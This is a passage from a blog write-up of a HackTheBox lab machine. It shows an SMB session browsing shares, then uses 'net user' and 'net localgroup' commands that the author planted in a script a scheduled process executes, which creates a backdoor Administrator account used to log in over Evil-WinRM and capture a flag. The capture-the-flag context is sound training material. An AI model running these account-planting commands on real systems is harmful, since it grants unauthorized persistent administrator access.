  tinygoos                            D        0  Fri May  1 15:59:20 2020
  whiteleopard                        D        0  Fri May  1 15:59:20 2020

		15587583 blocks of size 4096. 10896976 blocks available
smb: \> cd brittanycr
smb: \brittanycr\> ls
  .                                   D        0  Sun May  3 02:36:46 2020
  ..                                  D        0  Sun May  3 02:36:46 2020
  hosts.txt                           A       22  Sun May  3 16:44:57 2020

		15587583 blocks of size 4096. 10896958 blocks available
smb: \brittanycr\> get hosts.txt
getting file \brittanycr\hosts.txt of size 22 as hosts.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \brittanycr\> 

Hosts File Contents:

The hosts file doesn’t have much to show, but only a couple of domain names.

Creating a New Administrator User

Creating a new Administrator user is as simple as it is. It’s just a one line script away. I used the net user command to create a new user as follows:

net user nav1n P@ssw0rd! /add
net localgroup Administrators nav1n /add

I copy my new script o host file and upload it to Brittany’s directory and wait for a while to the script get executed and my new user Navin created.

Flag #2

After a minute I used Evil-WinRM again to login to the system as Navin and browse through the Administrator desktop and got the Flg#3.

That’s it, thank you for reading.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
Sorry, that action is blocked.